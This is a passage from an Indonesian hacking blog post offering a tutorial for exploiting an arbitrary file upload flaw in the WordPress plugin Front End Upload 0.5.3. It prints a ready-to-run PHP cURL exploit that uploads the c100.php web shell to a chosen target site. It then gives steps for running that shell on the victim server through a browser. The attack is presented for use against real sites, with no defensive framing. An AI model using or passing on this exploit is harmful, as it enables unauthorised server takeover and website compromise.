• About
  • Sitemap
  • Privacy Policy
  • Disclaimer
  • Contact

ICHAL CYBER BLOG | HANYA SEORANG MANUSIA BIASA YANG HAUS ILMU PENGETAHUAN

DRIVER PC,LAPTOP,NOTEBOOK,SOFTWARE, GAMES, WINDOWS, MOVIES, BACKTRACK, FREE GPRS, TELKOMSEL, INDOSAT, THREE, AXIS, XL, SMART, FREN, JAVA, SIS, SISX, PYTHON, HACKING, DEFACE, DLL

  • Home
  • INJEK / DIRECT
    • XL
    • THREE
    • INDOSAT
    • AXIS
    • TELKOMSEL
    • CDMA
  • VPS / SSH
    • PORT 80
    • PORT 22
    • PORT 143
    • PORT 443
  • SOFTWARE
    • EDITOR
    • VIDIO
    • AUDIO
    • FORMATER
    • VISUAL BASIC
    • WINDOWS
  • WINDOWS / LINUX
    • WNDOWS 7
    • WINDOWS 8
    • WINDOWS 8.1
    • LINUX
    • UBUNTU
    • BACKTRACK
  • MOVIES
    • ACTIONS
    • DRAMA
    • KOMEDI
    • HORROR
    • ROMANTIS
    • ADULT 21+
  • HACKING
    • SHELL
    • ADMIN PASSWORD
    • BRUTE FORCE
    • SYMLINK
    • ROOT SERVER
    • BACKDOOR
  • TUTORIAL
    • PHOTOSHOP
    • VISUAL BASIC
    • DELPHI 7
    • PYTHON
    • PERL
    • JAVA

.

Memuat...
Home » HACKING » Memanfaatkan celah Arbitrary File Upload pada plugin WordPress Front End Upload 0.5.3 untuk upload C100.PHP

Memanfaatkan celah Arbitrary File Upload pada plugin WordPress Front End Upload 0.5.3 untuk upload C100.PHP

Disini penulis kembali membahas tentang plugin wordpress. Tidak jauh berbeda dengan artikel http://blog.xcode.or.id/?p=1279, yang berbeda hanya nama plugin, exploit dan PHP shell yang digunakan.
Exploitnya yang dibuat oleh Adrien Thierry yang kemudian sedikit di edit untuk nama file saja dan situs.
<?php
$u=”c100.php”;
$c = curl_init(“http://situs.com/wp-content/plugins/front-end-upload/upload.php”);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array(‘file’=>”@$u”,’name’=>”c100.php”));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>
*situs.com diganti alamat web target
Simpan source code PHP tersebut dalam ekstensi PHP lalu disimpan ke satu folder dengan PHP.exe. Disini penulis menyimpannya dengan nama hackk2.php
Siapkan juga file c100.php yang dapat di cari di google untuk file PHP Shell ini.
Setelah itu jalankan perintah php hackk2.php










Setelah menjalankan perintah diatas maka buka browser. Jalankan perintah http://situs.com/wp-content/plugins/front-end-upload/FEU_DESTINATION_DIR/c100.php
Hasilnya adalah sebagai berikut












Binggo, C100 telah dijalankan diserver target.
 Sumber: blog.xcode.or.id
Posted by Ichal Bocah Catroxs on Senin, 25 Juni 2012 - Rating: 4.5
Title : Memanfaatkan celah Arbitrary File Upload pada plugin WordPress Front End Upload 0.5.3 untuk upload C100.PHP
Description : Disini penulis kembali membahas tentang plugin wordpress. Tidak jauh berbeda dengan artikel http://blog.xcode.or.id/?p=1279, yang berbeda ...

Share to

Facebook Google+ Twitter

0 Response to "Memanfaatkan celah Arbitrary File Upload pada plugin WordPress Front End Upload 0.5.3 untuk upload C100.PHP"

Posting Komentar

Posting Lebih Baru
Posting Lama
Beranda
Langganan: Posting Komentar (Atom)

Yahoo Messenger

ShoutBox

Entri Populer

  • Driver Toshiba Satellite C800 untuk Windows 7 32bit / x86
    Pratinjau sekejap Toshiba Satellite C800: Toshiba Satellite C800 memang sangat cocok buat anda yang mendambakan sebuah laptop harga terja...
  • [Driver] Axioo Neon CLW 3.522 Driver Dan Notebook Spesifikasi
    Pratinjau sekejab Axioo Neon CLW 3.522 : Laptop ini hadir dengan layar 12.1 inci dan mengusung teknologi intel prosssesor core i3.Buat an...
  • [Driver] Axioo Neon CLW 5.F20 Driver Dan Notebook Spesifikasi
    Pratinjau sekejab Axioo Neon CLW 5.F20 : Laptop ini hadir dengan layar 12.1 inci dan mengusung teknologi intel prosssesor core i5.Buat and...
  • Inject Indosat No Paket,Axis,Telkomsel,XL,Tri AON 11 Mei 2014
    Pada tanggal 11 Mei 2014 saya akan menshare Indosat yaitu Multi Kewer 1.3-1 ( New Version ) yang dibuat oleh Ifan Glewo untuk mendownload kl...

Label

  • DRIVER PC
  • GAMES
  • HACKING
  • INJECT DIRECT
  • PHREAKING
  • SOFTWARE
  • SSH VPS
  • TUTORIAL
  • WINDOWS

Random Post


WWW.JIBEG.TK

WWW.JIBEG.TK
PING


#
#

Please Bantu Saya, Like This !!!

×

Powered By Blog

Copyright © 2010 ICHAL CYBER BLOG | HANYA SEORANG MANUSIA BIASA YANG HAUS ILMU PENGETAHUAN - All Rights Reserved
Design by ICHAL SCUMET - Powered by Blogger